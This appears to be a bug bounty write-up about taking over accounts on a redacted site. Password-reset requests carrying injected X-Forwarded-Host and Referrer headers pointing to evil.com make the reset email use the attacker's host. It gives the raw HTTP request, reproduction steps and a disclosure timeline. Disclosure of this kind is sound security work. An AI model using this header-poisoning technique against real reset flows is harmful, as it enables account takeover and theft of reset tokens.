ATO via Host Header Poisoning

Hello Everyone (Ram Ram Ji),

This article is about an account takeover bug via host header poisoning. Redacted.com was vulnerable to host header injection in which remote attackers can exploit it to takeover any account of redacted.com.

Attacking Scenario:

As an attacker, I modified the POST request in which first I change the value of the Host header to evil.com but nothing happened then I add the X-Forwarded-Host header with evil.com value again nothing happened. It was my third attempt now, this time I changed the value of the Referrer header too and put the same value as the X-Forwarded-Host header value and it got worked for me.

Request was looked like:

POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com

username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e

Request Looks Like

After sending the request I got email with host as evil.com looks like:

Got email with malicious host

Step to Reproduce (Acc. to Report):

1. Navigate to “​https://redacted.com/forgot".
2. Then enter your username & intercept that request with the help of Burp Suite.
3. Now add these two headers into the POST request:

X-Forwarded-Host: evil.com
Referrer: https://evil.com

4. Now forward that request and check your email that is linked with your username.

Timeline:

Bounty Rewarded

June 26, 2019 — Reported to private program
August 01, 2019 — Report Triaged
August 08, 2019 — Bounty of $2000 USD awarded
October 24, 2019 — Vulnerability fixed

Special thanks to nullr3x (Big Bad Brother 🤑 )